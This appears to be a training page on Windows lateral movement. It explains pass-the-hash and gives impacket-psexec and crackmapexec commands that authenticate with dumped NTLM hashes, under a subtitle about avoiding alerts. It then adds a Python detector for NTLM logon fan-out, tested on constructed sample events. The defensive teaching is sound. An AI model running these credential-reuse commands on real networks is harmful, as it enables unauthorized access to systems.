Lateral Movement Techniques
Move through networks using WMI, PsExec, WinRM, and SMB shares without triggering alerts.
What is Lateral Movement?
Lateral movement is the set of techniques attackers use to progressively move through a network after initial compromise — pivoting from the first foothold toward higher-value targets like domain controllers, databases, and backup systems.
Pass-the-Hash (PtH)
Windows NTLM authentication computes its challenge response from the password hash rather than the plaintext password, so the hash alone is enough to authenticate. An attacker who has dumped NTLM hashes can authenticate to other systems without cracking them.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH
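On the target side, both commands above leave NTLM network logons (Security event 4624, logon type 3), and a sweep across a subnet shows up as one account reaching many hosts from one source in a short time. The Python below is an added example, not part of the original lesson; the JSON-lines export format, the thresholds and the sample events are assumptions constructed for illustration.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Security 4624 events exported as JSON lines (assumed format).
SAMPLE = """
{"TimeCreated":"2024-05-01T10:00:01","Computer":"WS01","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"administrator","IpAddress":"10.0.0.23"}
{"TimeCreated":"2024-05-01T10:00:03","Computer":"WS02","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"administrator","IpAddress":"10.0.0.23"}
{"TimeCreated":"2024-05-01T10:00:04","Computer":"FS01","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"Administrator","IpAddress":"10.0.0.23"}
{"TimeCreated":"2024-05-01T10:00:09","Computer":"DC01","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"administrator","IpAddress":"10.0.0.23"}
{"TimeCreated":"2024-05-01T10:00:10","Computer":"WS03","EventID":4624,"LogonType":3,"AuthenticationPackageName":"Kerberos","TargetUserName":"administrator","IpAddress":"10.0.0.23"}
{"TimeCreated":"2024-05-01T10:01:00","Computer":"FS01","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"jsmith","IpAddress":"10.0.0.40"}
{"TimeCreated":"2024-05-01T10:02:00","Computer":"FS01","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"jsmith","IpAddress":"10.0.0.40"}
{"TimeCreated":"2024-05-01T11:00:00","Computer":"WS05","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"administrator","IpAddress":"10.0.0.23"}
"""

def ntlm_fanout(lines, min_hosts=3, window=timedelta(minutes=5)):
    """Return sorted (source_ip, account, host_count) where one source made NTLM
    network logons with one account to >= min_hosts distinct hosts inside window."""
    seen = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue  # only successful network logons
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue  # Kerberos logons are out of scope for this check
        user = ev.get("TargetUserName", "").lower()
        if user.endswith("$") or user == "anonymous logon":
            continue  # skip machine accounts and null sessions
        seen[(ev.get("IpAddress", "-"), user)].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["Computer"].upper()))
    alerts = []
    for (ip, user), hits in seen.items():
        hits.sort()
        best = start = 0
        for end in range(len(hits)):  # sliding time window over sorted logons
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({host for _, host in hits[start:end + 1]}))
        if best >= min_hosts:
            alerts.append((ip, user, best))
    return sorted(alerts)

if __name__ == "__main__":
    print(ntlm_fanout(SAMPLE.splitlines()))
```

Tune min_hosts and window against normal administrative traffic, since management servers and vulnerability scanners legitimately produce the same fan-out pattern.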